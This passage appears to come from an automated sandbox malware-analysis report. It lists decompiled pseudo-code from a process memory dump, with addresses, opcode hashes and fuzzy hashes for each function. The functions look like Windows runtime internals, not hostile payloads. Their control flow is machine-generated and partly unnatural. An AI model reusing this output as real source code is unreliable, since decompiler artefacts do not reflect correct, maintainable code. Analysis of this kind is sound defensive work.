				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04819910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E048195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E048195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E048195D0();
				return L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                        0x0486c458
                                                        0x0486c45d
                                                        0x0486c466
                                                        0x0486c468
                                                        0x0486c469
                                                        0x0486c46a
                                                        0x0486c46b
                                                        0x0486c46e
                                                        0x0486c46f
                                                        0x0486c471
                                                        0x0486c476
                                                        0x0486c476
                                                        0x0486c47c
                                                        0x0486c47e
                                                        0x0486c480
                                                        0x0486c480
                                                        0x0486c483
                                                        0x0486c484
                                                        0x0486c486
                                                        0x0486c488
                                                        0x0486c48f
                                                        0x0486c491
                                                        0x0486c493
                                                        0x0486c493
                                                        0x0486c48f
                                                        0x0486c498
                                                        0x0486c49e
                                                        0x0486c4ad
                                                        0x0486c4ad
                                                        0x0486c4b2
                                                        0x0486c4b4
                                                        0x0486c4cd

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                        • Instruction ID: 31cad8d004e3cbb97215966487b9751445437fdb44cb32bc600bd72a1178814d
                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                        • Instruction Fuzzy Hash: FC01D671140505BFE711AF29CC80EA2FB6DFF44394F004A26F25592670CB21BCA0C6A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D9080, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E047D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x48c85ec;
				E047F2280(_t48, 0x48c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E047EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x48c538c; // 0x773b6888
					if( *_t84 != 0x48c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x48af6e8);
						E0482D0E8(0x48c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E048A88F5(_t80, _t85, 0x48c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x48c86c0; // 0x6607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x48c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E047F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E048A88F5(0x48c85ec, _t85, 0x48c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0481AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x48cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x48c84c0;
																			if(_t82 >=  *0x48c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E048A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E047D922A(_t99);
										_t64 = E047F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E048A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x48c86c0; // 0x6607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x48c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x48c86bc;
													_t87 = 0x48c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E047D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x48c86c4;
												_t87 = 0x48c86c0;
												L27:
												E04809B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0482D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x48c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x48c538c = _t51;
						goto L6;
					}
				}
			}




















                                                        0x047d9082
                                                        0x047d9083
                                                        0x047d9084
                                                        0x047d9085
                                                        0x047d9087
                                                        0x047d9096
                                                        0x047d9098
                                                        0x047d9098
                                                        0x047d909e
                                                        0x047d90a8
                                                        0x047d90e7
                                                        0x047d90e7
                                                        0x047d90aa
                                                        0x047d90b0
                                                        0x047d90b7
                                                        0x047d90bd
                                                        0x047d90dd
                                                        0x047d90e6
                                                        0x047d90bf
                                                        0x047d90bf
                                                        0x047d90c7
                                                        0x047d90cf
                                                        0x047d90f1
                                                        0x047d90f2
                                                        0x047d90f4
                                                        0x047d90f5
                                                        0x047d90f6
                                                        0x047d90f7
                                                        0x047d90f8
                                                        0x047d90f9
                                                        0x047d90fa
                                                        0x047d90fb
                                                        0x047d90fc
                                                        0x047d90fd
                                                        0x047d90fe
                                                        0x047d90ff
                                                        0x047d9100
                                                        0x047d9102
                                                        0x047d9107
                                                        0x047d910c
                                                        0x047d9110
                                                        0x047d9113
                                                        0x047d9115
                                                        0x047d9136
                                                        0x047d913f
                                                        0x047d9143
                                                        0x048337e4
                                                        0x048337e4
                                                        0x047d9117
                                                        0x047d9117
                                                        0x047d911d
                                                        0x00000000
                                                        0x047d911f
                                                        0x047d911f
                                                        0x047d9125
                                                        0x00000000
                                                        0x047d9127
                                                        0x047d912d
                                                        0x047d9130
                                                        0x047d9134
                                                        0x047d9158
                                                        0x047d915d
                                                        0x047d9161
                                                        0x047d9168
                                                        0x04833715
                                                        0x047d916e
                                                        0x047d916e
                                                        0x047d9175
                                                        0x047d9177
                                                        0x047d917e
                                                        0x047d917f
                                                        0x047d9182
                                                        0x047d9182
                                                        0x047d9187
                                                        0x047d9187
                                                        0x047d918a
                                                        0x047d918d
                                                        0x047d918f
                                                        0x047d9192
                                                        0x047d9195
                                                        0x047d9198
                                                        0x047d9198
                                                        0x047d9198
                                                        0x047d919a
                                                        0x00000000
                                                        0x00000000
                                                        0x0483371f
                                                        0x04833721
                                                        0x04833727
                                                        0x0483372f
                                                        0x04833733
                                                        0x04833735
                                                        0x04833738
                                                        0x0483373b
                                                        0x0483373d
                                                        0x04833740
                                                        0x00000000
                                                        0x04833746
                                                        0x04833746
                                                        0x04833749
                                                        0x00000000
                                                        0x0483374f
                                                        0x0483374f
                                                        0x04833751
                                                        0x04833757
                                                        0x04833759
                                                        0x0483375c
                                                        0x0483375c
                                                        0x0483375e
                                                        0x0483375e
                                                        0x04833761
                                                        0x04833764
                                                        0x00000000
                                                        0x00000000
                                                        0x04833766
                                                        0x04833768
                                                        0x048337a3
                                                        0x048337a3
                                                        0x048337a5
                                                        0x048337a7
                                                        0x048337ad
                                                        0x048337b0
                                                        0x048337b2
                                                        0x048337bc
                                                        0x048337c2
                                                        0x048337c2
                                                        0x048337b2
                                                        0x047d9187
                                                        0x047d9187
                                                        0x047d918a
                                                        0x047d918d
                                                        0x047d918f
                                                        0x047d9192
                                                        0x047d9195
                                                        0x00000000
                                                        0x047d9195
                                                        0x00000000
                                                        0x0483376a
                                                        0x0483376a
                                                        0x0483376a
                                                        0x0483376c
                                                        0x0483376c
                                                        0x0483376f
                                                        0x04833775
                                                        0x00000000
                                                        0x00000000
                                                        0x04833777
                                                        0x04833779
                                                        0x04833782
                                                        0x04833787
                                                        0x04833789
                                                        0x04833790
                                                        0x04833790
                                                        0x0483378b
                                                        0x0483378b
                                                        0x0483378b
                                                        0x04833792
                                                        0x04833795
                                                        0x00000000
                                                        0x04833795
                                                        0x00000000
                                                        0x04833779
                                                        0x04833798
                                                        0x00000000
                                                        0x04833798
                                                        0x00000000
                                                        0x04833768
                                                        0x0483379b
                                                        0x0483379b
                                                        0x04833751
                                                        0x04833749
                                                        0x00000000
                                                        0x04833740
                                                        0x047d91a0
                                                        0x047d91a3
                                                        0x047d91a9
                                                        0x047d91b0
                                                        0x00000000
                                                        0x047d91b0
                                                        0x047d9187
                                                        0x047d91b4
                                                        0x047d91b4
                                                        0x047d91bb
                                                        0x047d91c0
                                                        0x047d91c5
                                                        0x047d91c7
                                                        0x048337da
                                                        0x047d91cd
                                                        0x047d91cd
                                                        0x047d91cd
                                                        0x047d91d2
                                                        0x047d91d5
                                                        0x047d9239
                                                        0x047d9239
                                                        0x047d91d7
                                                        0x047d91db
                                                        0x047d91e1
                                                        0x047d91e7
                                                        0x047d91fd
                                                        0x047d9203
                                                        0x047d921e
                                                        0x047d9223
                                                        0x00000000
                                                        0x047d9205
                                                        0x047d9205
                                                        0x047d9208
                                                        0x047d920c
                                                        0x047d9214
                                                        0x047d9214
                                                        0x047d920c
                                                        0x047d91e9
                                                        0x047d91e9
                                                        0x047d91ee
                                                        0x047d91f3
                                                        0x047d91f3
                                                        0x047d91f3
                                                        0x047d91e7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047d9134
                                                        0x047d9125
                                                        0x047d911d
                                                        0x047d914e
                                                        0x047d90d1
                                                        0x047d90d1
                                                        0x047d90d3
                                                        0x047d90d6
                                                        0x047d90d8
                                                        0x00000000
                                                        0x047d90d8
                                                        0x047d90cf

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3c8e7d0e14cf8e128cb182e84c05290096c67ce345d7a6f39242bc24b8e3c5b
                                                        • Instruction ID: 6ee4dfe74da79eb5f2aea31e4c55e944e60a443b6f760ef77172c2c688d85ab6
                                                        • Opcode Fuzzy Hash: b3c8e7d0e14cf8e128cb182e84c05290096c67ce345d7a6f39242bc24b8e3c5b
                                                        • Instruction Fuzzy Hash: 8D01F4F26112159FE7249F18E840B1177B9EB86324F254966E701DBB91C374FC41CBD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A4015, Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E048A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E047F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E047F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x48c86ac);
					E047DF900(0x48c86d4, _t28);
					E047EFFB0(0x48c86ac, _t28, 0x48c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E047EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                        0x048a401a
                                                        0x048a401e
                                                        0x048a4023
                                                        0x048a4028
                                                        0x048a4029
                                                        0x048a402b
                                                        0x048a402f
                                                        0x048a4043
                                                        0x048a4046
                                                        0x048a4051
                                                        0x048a4057
                                                        0x048a405f
                                                        0x048a4062
                                                        0x048a4067
                                                        0x048a406f
                                                        0x048a407c
                                                        0x048a407c
                                                        0x048a408c
                                                        0x048a408c
                                                        0x048a4097

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7362900b5e24c17ca1c58c8f1283a4c40f338a87f6853b74d6f20e1dbbb1710f
                                                        • Instruction ID: 29b40e5e6e99d76b88fa4fb29a6dbf9ebb5a13ffeca97431a96d9cbcb86c8c51
                                                        • Opcode Fuzzy Hash: 7362900b5e24c17ca1c58c8f1283a4c40f338a87f6853b74d6f20e1dbbb1710f
                                                        • Instruction Fuzzy Hash: 590171712419457FE651BB69CD88E53B7ACFB49658B010729F608C3B52CB64FC11CAE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048914FB, Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E048914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x48cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0481FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E047F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0481B640(E04819AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                        0x048914fb
                                                        0x048914fb
                                                        0x0489150a
                                                        0x04891514
                                                        0x04891519
                                                        0x0489151b
                                                        0x04891526
                                                        0x0489152c
                                                        0x04891534
                                                        0x04891537
                                                        0x0489153a
                                                        0x04891545
                                                        0x04891557
                                                        0x04891547
                                                        0x04891550
                                                        0x04891550
                                                        0x04891562
                                                        0x04891563
                                                        0x04891565
                                                        0x0489156a
                                                        0x0489157f

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d92d9dbbbf3354fdd41c24b9a3c9b74fe71036ef28e80e0a9a511d39679c82b6
                                                        • Instruction ID: 0b6741109afca4e9245acaf1158bb3ab45525a2a626651a7e991514436516204
                                                        • Opcode Fuzzy Hash: d92d9dbbbf3354fdd41c24b9a3c9b74fe71036ef28e80e0a9a511d39679c82b6
                                                        • Instruction Fuzzy Hash: C6018071A00248ABDB04DF6CD845EAEB7B8EF44714F404567F914EB390D674EE40CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489138A, Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E0489138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x48cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0481FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E047F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0481B640(E04819AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                        0x0489138a
                                                        0x0489138a
                                                        0x04891399
                                                        0x048913a3
                                                        0x048913a8
                                                        0x048913aa
                                                        0x048913b5
                                                        0x048913bb
                                                        0x048913c3
                                                        0x048913c6
                                                        0x048913c9
                                                        0x048913d4
                                                        0x048913e6
                                                        0x048913d6
                                                        0x048913df
                                                        0x048913df
                                                        0x048913f1
                                                        0x048913f2
                                                        0x048913f4
                                                        0x048913f9
                                                        0x0489140e

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72da5f5e29b8540dd099930ad8563c106d5fe9837180cbe7b212c8d5f00c8cef
                                                        • Instruction ID: 8172a2b1bd45fa2df671143ca40c58f66e5f5620262d7c91fdd75e09637f70d4
                                                        • Opcode Fuzzy Hash: 72da5f5e29b8540dd099930ad8563c106d5fe9837180cbe7b212c8d5f00c8cef
                                                        • Instruction Fuzzy Hash: 6E019271A00208AFDB04DFACD845EAEB7B8EF44714F404567F904EB380E674AE41C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D58EC, Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E047D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x48cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x47b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E047D5943() != 0 &&  *0x48c5320 > 5) {
					E04857B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04857B5E( &_v28, _t28);
					_t11 = E04857B9C(0x48c5320, 0x47bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0481B640(_t11, _t17, _v8 ^ _t29, 0x47bbf15, _t27, _t28);
			}















                                                        0x047d58fb
                                                        0x047d58fe
                                                        0x047d5906
                                                        0x047d590a
                                                        0x047d593c
                                                        0x047d593c
                                                        0x047d590c
                                                        0x047d590c
                                                        0x047d5911
                                                        0x00000000
                                                        0x047d5913
                                                        0x047d5913
                                                        0x047d5913
                                                        0x047d5911
                                                        0x047d591d
                                                        0x04831035
                                                        0x0483103c
                                                        0x0483103f
                                                        0x04831056
                                                        0x04831056
                                                        0x047d593b

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4eab2aa4b06567dee2bce6ddd0b33a0508cf958408c85ab2b4ad348fdf6d888
                                                        • Instruction ID: d0472423b5afac9971fa256e2245a8d44ae9cfd39ad58781d1f02b38b9f61343
                                                        • Opcode Fuzzy Hash: b4eab2aa4b06567dee2bce6ddd0b33a0508cf958408c85ab2b4ad348fdf6d888
                                                        • Instruction Fuzzy Hash: 2C018F31A10118ABEB14EA39DC04AAE77B9EB84234F9545699805E7358EE70FD068692
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047EB02A, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E047F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04857016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                        0x047eb037
                                                        0x047eb039
                                                        0x047eb03b
                                                        0x047eb040
                                                        0x0483a60e
                                                        0x00000000
                                                        0x00000000
                                                        0x0483a61d
                                                        0x047eb04b
                                                        0x047eb04e
                                                        0x0483a627
                                                        0x0483a634
                                                        0x00000000
                                                        0x00000000
                                                        0x0483a641
                                                        0x0483a653
                                                        0x0483a643
                                                        0x0483a64c
                                                        0x0483a64c
                                                        0x0483a65b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0483a66c
                                                        0x047eb057
                                                        0x047eb057
                                                        0x047eb057
                                                        0x047eb046
                                                        0x047eb046
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                        • Instruction ID: 543b8f761eca10cf98d02d3211f6970fb120f69d123e0eded4f6b2c295b17059
                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                        • Instruction Fuzzy Hash: D001DF32301984DFD326CB5EC888F767BE8EB49754F0909A1F919CBB61E628FC40C260
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A1074, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048A1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E048A165E(__ebx, 0x48c8ae4, (__edx -  *0x48c8b04 >> 0x14) + (__edx -  *0x48c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x48c8b04 >> 0x14) + (__edx -  *0x48c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0489AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E047F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0488FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                        0x048a1074
                                                        0x048a1080
                                                        0x048a1082
                                                        0x048a108a
